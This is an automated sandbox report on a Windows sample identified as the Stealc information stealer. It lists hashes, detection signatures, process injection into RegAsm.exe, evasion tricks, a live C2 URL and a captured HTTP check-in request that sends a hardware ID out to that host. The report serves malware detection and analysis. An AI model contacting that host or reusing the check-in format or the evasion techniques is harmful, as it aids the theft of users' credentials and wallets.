
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1509593
MD5: 032d49a1f22f5ec2d498fcf0f4076d91
SHA1: e076ae8c8efe84d414932f84aca43617a31bf0e0
SHA256: e45ef7fdd1a92c5ed40b3365a895623a112ee16444cf0ebe70619cf09d8628ca
Tags: exe

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
.NET source code contains very large array initializations
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Injects a PE file into a foreign processes
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6628 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 032D49A1F22F5EC2D498FCF0F4076D91)
    • conhost.exe (PID: 5032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 5972 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://45.152.113.10/92335b4816f77e90.php"}
Source | Rule | Description | Author
00000003.00000002.2071712339.0000000000EDA000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 6628 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: RegAsm.exe PID: 5972 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: RegAsm.exe PID: 5972 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-11T20:39:03.632416+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49707 | 45.152.113.10 | 80 | TCP


          AV Detection

Source: http://45.152.113.10/92335b4816f77e90.phpQ | Avira URL Cloud: Label: malware
Source: http://45.152.113.10/P | Avira URL Cloud: Label: malware
Source: http://45.152.113.10/9 | Avira URL Cloud: Label: malware
Source: http://45.152.113.10/t | Avira URL Cloud: Label: malware
Source: http://45.152.113.10/92335b4816f77e90.phpI | Avira URL Cloud: Label: malware
Source: http://45.152.113.10/92335b4816f77e90.php | Avira URL Cloud: Label: malware
Source: http://45.152.113.10/D | Avira URL Cloud: Label: malware
Source: http://45.152.113.10 | Avira URL Cloud: Label: malware
Source: http://45.152.113.10/92335b4816f77e90.php= | Avira URL Cloud: Label: malware
Source: http://45.152.113.10/ | Avira URL Cloud: Label: malware
Source: 00000003.00000002.2071712339.0000000000EDA000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: StealC {"C2 url": "http://45.152.113.10/92335b4816f77e90.php"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: .pdb8% source: file.exe

          Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49707 -> 45.152.113.10:80
Source: Malware configuration extractor | URLs: http://45.152.113.10/92335b4816f77e90.php
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 45.152.113.10 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /92335b4816f77e90.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----IECAFHDBGHJKFIDHJJJE | Host: 45.152.113.10 | Content-Length: 210 | Connection: Keep-Alive | Cache-Control: no-cache | Data Ascii: ------IECAFHDBGHJKFIDHJJJE Content-Disposition: form-data; name="hwid" 0C929DDD0A2E3441041814 ------IECAFHDBGHJKFIDHJJJE Content-Disposition: form-data; name="build" cry ------IECAFHDBGHJKFIDHJJJE--
Source: Joe Sandbox View | IP Address: 45.152.113.10
Source: Joe Sandbox View | ASN Name: CODECCLOUD-AS-APCodecCloudHKLimitedHK
Source: unknown | TCP traffic detected without corresponding DNS query: 45.152.113.10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_004062D0 InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile, 3_2_004062D0
Source: unknown | HTTP traffic detected: POST /92335b4816f77e90.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----IECAFHDBGHJKFIDHJJJE | Host: 45.152.113.10 | Content-Length: 210 | Connection: Keep-Alive | Cache-Control: no-cache | Data Ascii: ------IECAFHDBGHJKFIDHJJJE Content-Disposition: form-data; name="hwid" 0C929DDD0A2E3441041814 ------IECAFHDBGHJKFIDHJJJE Content-Disposition: form-data; name="build" cry ------IECAFHDBGHJKFIDHJJJE--
Source: RegAsm.exe, 00000003.00000002.2071712339.0000000000EDA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.152.113.10
Source: RegAsm.exe, 00000003.00000002.2071712339.0000000000EDA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2071712339.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.152.113.10/
Source: RegAsm.exe, 00000003.00000002.2071712339.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.152.113.10/9
Source: RegAsm.exe, 00000003.00000002.2071712339.0000000000F3E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2071712339.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.152.113.10/92335b4816f77e90.php
Source: RegAsm.exe, 00000003.00000002.2071712339.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.152.113.10/92335b4816f77e90.php=
Source: RegAsm.exe, 00000003.00000002.2071712339.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.152.113.10/92335b4816f77e90.phpI
Source: RegAsm.exe, 00000003.00000002.2071712339.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.152.113.10/92335b4816f77e90.phpQ
Source: RegAsm.exe, 00000003.00000002.2071712339.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.152.113.10/D
Source: RegAsm.exe, 00000003.00000002.2071712339.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.152.113.10/P
Source: RegAsm.exe, 00000003.00000002.2071712339.0000000000EDA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.152.113.10/t
Source: RegAsm.exe, 00000003.00000002.2071712339.0000000000EDA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.152.113.104
Source: RegAsm.exe, 00000003.00000002.2071712339.0000000000EDA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.152.113.10H
Source: file.exe | String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
Source: file.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: file.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: file.exe | String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: file.exe | String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
Source: file.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: file.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: file.exe | String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: file.exe | String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe | String found in binary or memory: http://ocsp.digicert.com0A
Source: file.exe | String found in binary or memory: http://ocsp.entrust.net02
Source: file.exe | String found in binary or memory: http://ocsp.entrust.net03
Source: file.exe | String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe | String found in binary or memory: http://www.entrust.net/rpa03
Source: file.exe | String found in binary or memory: https://www.entrust.net/rpa0

          System Summary

Source: file.exe, MoveAngles.cs | Large array initialization: MoveAngles: array initializer size 192000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00404610 appears 316 times
Source: file.exe | Static PE information: invalid certificate
Source: file.exe, 00000000.00000000.2056875130.0000000000614000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameVQP.exeX vs file.exe
Source: file.exe, 00000000.00000002.2061103627.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe | Binary or memory string: OriginalFilenameVQP.exeX vs file.exe
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine | Classification label: mal100.troj.evad.winEXE@4/1@0/1
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log
Source: C:\Users\user\Desktop\file.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5032:120:WilError_03
Source: file.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\file.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: file.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: .pdb8% source: file.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_0041BA2C LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 3_2_0041BA2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_0041A9F5 push ecx; ret 3_2_0041AA08
Source: file.exe | Static PE information: section name: .text entropy: 7.99138693606094
Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exe | Memory allocated: 2890000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\file.exe | Memory allocated: 2A30000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\file.exe | Memory allocated: 4A30000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\file.exe TID: 6472 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_00401160 GetSystemInfo, 3_2_00401160
Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 922337203685477
Source: RegAsm.exe, 00000003.00000002.2071712339.0000000000EDA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
Source: RegAsm.exe, 00000003.00000002.2071712339.0000000000F3E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2071712339.0000000000F0B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_0041ACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_0041ACFA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_00404610 VirtualProtect ?,00000004,00000100,00000000 3_2_00404610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_00419160 mov eax, dword ptr fs:[00000030h] 3_2_00419160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_00404610 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,GetProcessHeap,RtlAllocateHeap,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,strlen,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,VirtualProtect, 3_2_00404610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_0041C8D9 SetUnhandledExceptionFilter, 3_2_0041C8D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_0041A718 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_0041A718
Source: C:\Users\user\Desktop\file.exe | Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 6628, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 5972, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_02A32429 CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread, 0_2_02A32429
Source: C:\Users\user\Desktop\file.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\file.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\Desktop\file.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\Desktop\file.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 41E000
Source: C:\Users\user\Desktop\file.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42B000
Source: C:\Users\user\Desktop\file.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 63E000
Source: C:\Users\user\Desktop\file.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 88F008
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_004172F0 GetUserNameA, 3_2_004172F0
Source: file.exe, 00000000.00000002.2061103627.0000000000D82000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: avp.exe
Source: file.exe, 00000000.00000002.2061103627.0000000000D82000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: AVP.exe

          Stealing of Sensitive Information

Source: Yara match | File source: 00000003.00000002.2071712339.0000000000EDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 5972, type: MEMORYSTR

          Remote Access Functionality

Source: Yara match | File source: 00000003.00000002.2071712339.0000000000EDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 5972, type: MEMORYSTR

MITRE ATT&CK Matrix (techniques matched by signatures, with the number shown on the matrix)

  • Execution: Native API (1)
  • Persistence: DLL Side-Loading (1)
  • Privilege Escalation: Process Injection (411), DLL Side-Loading (1)
  • Defense Evasion: Masquerading (1), Disable or Modify Tools (11), Virtualization/Sandbox Evasion (31), Process Injection (411), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (3), Software Packing (2), DLL Side-Loading (1)
  • Discovery: Security Software Discovery (31), Virtualization/Sandbox Evasion (31), Account Discovery (1), System Owner/User Discovery (1), System Information Discovery (12)
  • Command and Control: Ingress Tool Transfer (2), Non-Application Layer Protocol (2), Application Layer Protocol (12)
  • Reconnaissance, Resource Development, Initial Access, Credential Access, Lateral Movement, Collection, Exfiltration, Impact: no technique matched
          No Antivirus matches
Source | Detection | Scanner | Label
http://45.152.113.10/92335b4816f77e90.phpQ | 100% | Avira URL Cloud | malware
http://www.entrust.net/rpa03 | 0% | Avira URL Cloud | safe
http://45.152.113.10/P | 100% | Avira URL Cloud | malware
http://45.152.113.10/9 | 100% | Avira URL Cloud | malware
http://45.152.113.10/t | 100% | Avira URL Cloud | malware
http://45.152.113.10/92335b4816f77e90.phpI | 100% | Avira URL Cloud | malware
http://ocsp.entrust.net02 | 0% | Avira URL Cloud | safe
http://aia.entrust.net/ts1-chain256.cer01 | 0% | Avira URL Cloud | safe
http://45.152.113.10/92335b4816f77e90.php | 100% | Avira URL Cloud | malware
http://ocsp.entrust.net03 | 0% | Avira URL Cloud | safe
http://45.152.113.10/D | 100% | Avira URL Cloud | malware
http://45.152.113.10 | 100% | Avira URL Cloud | malware
http://crl.entrust.net/ts1ca.crl0 | 0% | Avira URL Cloud | safe
http://45.152.113.104 | 0% | Avira URL Cloud | safe
http://45.152.113.10H | 0% | Avira URL Cloud | safe
http://45.152.113.10/92335b4816f77e90.php= | 100% | Avira URL Cloud | malware
http://crl.entrust.net/2048ca.crl0 | 0% | Avira URL Cloud | safe
https://www.entrust.net/rpa0 | 0% | Avira URL Cloud | safe
http://45.152.113.10/ | 100% | Avira URL Cloud | malware
          No contacted domains info
          Name | Malicious | Antivirus Detection | Reputation
          http://45.152.113.10/92335b4816f77e90.php | true | Avira URL Cloud: malware | unknown
          http://45.152.113.10/ | true | Avira URL Cloud: malware | unknown
          Name | Source | Malicious | Antivirus Detection | Reputation
          http://45.152.113.10/9 | RegAsm.exe, 00000003.00000002.2071712339.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
          http://45.152.113.10/92335b4816f77e90.phpI | RegAsm.exe, 00000003.00000002.2071712339.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
          http://45.152.113.10/t | RegAsm.exe, 00000003.00000002.2071712339.0000000000EDA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
          http://45.152.113.10/P | RegAsm.exe, 00000003.00000002.2071712339.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
          http://ocsp.entrust.net03 | file.exe | false | Avira URL Cloud: safe | unknown
          http://45.152.113.10/92335b4816f77e90.phpQ | RegAsm.exe, 00000003.00000002.2071712339.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
          http://ocsp.entrust.net02 | file.exe | false | Avira URL Cloud: safe | unknown
          http://www.entrust.net/rpa03 | file.exe | false | Avira URL Cloud: safe | unknown
          http://aia.entrust.net/ts1-chain256.cer01 | file.exe | false | Avira URL Cloud: safe | unknown
          http://45.152.113.10/D | RegAsm.exe, 00000003.00000002.2071712339.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
          http://45.152.113.10H | RegAsm.exe, 00000003.00000002.2071712339.0000000000EDA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://45.152.113.10 | RegAsm.exe, 00000003.00000002.2071712339.0000000000EDA000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
          http://45.152.113.10/92335b4816f77e90.php= | RegAsm.exe, 00000003.00000002.2071712339.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
          http://crl.entrust.net/ts1ca.crl0 | file.exe | false | Avira URL Cloud: safe | unknown
          http://45.152.113.104 | RegAsm.exe, 00000003.00000002.2071712339.0000000000EDA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://crl.entrust.net/2048ca.crl0 | file.exe | false | Avira URL Cloud: safe | unknown
          https://www.entrust.net/rpa0 | file.exe | false | Avira URL Cloud: safe | unknown
          IP | Domain | Country | ASN | ASN Name | Malicious
          45.152.113.10 | unknown | Russian Federation | 138576 | CODECCLOUD-AS-AP CodecCloud HK Limited HK | true
          Joe Sandbox version:40.0.0 Tourmaline
          Analysis ID:1509593
          Start date and time:2024-09-11 20:38:06 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 2m 16s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of new started processes analysed:4
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:file.exe
          Detection:MAL
          Classification:mal100.troj.evad.winEXE@4/1@0/1
          EGA Information:
          • Successful, ratio: 100%
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 20
          • Number of non-executed functions: 18
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Stop behavior analysis, all processes terminated
          • Exclude process from analysis (whitelisted): dllhost.exe
          • Not all processes were analyzed, report is missing behavior information
          • Report size getting too big, too many NtQueryValueKey calls found.
          • VT rate limit hit for: file.exe
          No simulations
          Match | Associated Sample Name / URL | Detection | Threat Name | Context
          45.152.113.10 | file.exe | malicious | Stealc | 45.152.113.10/92335b4816f77e90.php
          45.152.113.10 | file.exe | malicious | Clipboard Hijacker, Stealc, Vidar | 45.152.113.10/92335b4816f77e90.php
          45.152.113.10 | file.exe | malicious | Stealc | 45.152.113.10/92335b4816f77e90.php
          45.152.113.10 | file.exe | malicious | Stealc | 45.152.113.10/92335b4816f77e90.php
          45.152.113.10 | file.exe | malicious | Clipboard Hijacker, Stealc, Vidar | 45.152.113.10/92335b4816f77e90.php
          45.152.113.10 | file.exe | malicious | Stealc | 45.152.113.10/92335b4816f77e90.php
          45.152.113.10 | file.exe | malicious | Clipboard Hijacker, Stealc, Vidar | 45.152.113.10/92335b4816f77e90.php
          45.152.113.10 | file.exe | malicious | Stealc | 45.152.113.10/92335b4816f77e90.php
          45.152.113.10 | file.exe | malicious | Clipboard Hijacker, Stealc, Vidar | 45.152.113.10/92335b4816f77e90.php
          No context
          Match | Associated Sample Name / URL | Detection | Threat Name | Context
          CODECCLOUD-AS-AP CodecCloud HK Limited HK | file.exe | malicious | Stealc | 45.152.113.10
          CODECCLOUD-AS-AP CodecCloud HK Limited HK | file.exe | malicious | Clipboard Hijacker, Stealc, Vidar | 45.152.113.10
          CODECCLOUD-AS-AP CodecCloud HK Limited HK | file.exe | malicious | Stealc | 45.152.113.10
          CODECCLOUD-AS-AP CodecCloud HK Limited HK | file.exe | malicious | Stealc | 45.152.113.10
          CODECCLOUD-AS-AP CodecCloud HK Limited HK | file.exe | malicious | Clipboard Hijacker, Stealc, Vidar | 45.152.113.10
          CODECCLOUD-AS-AP CodecCloud HK Limited HK | file.exe | malicious | Stealc | 45.152.113.10
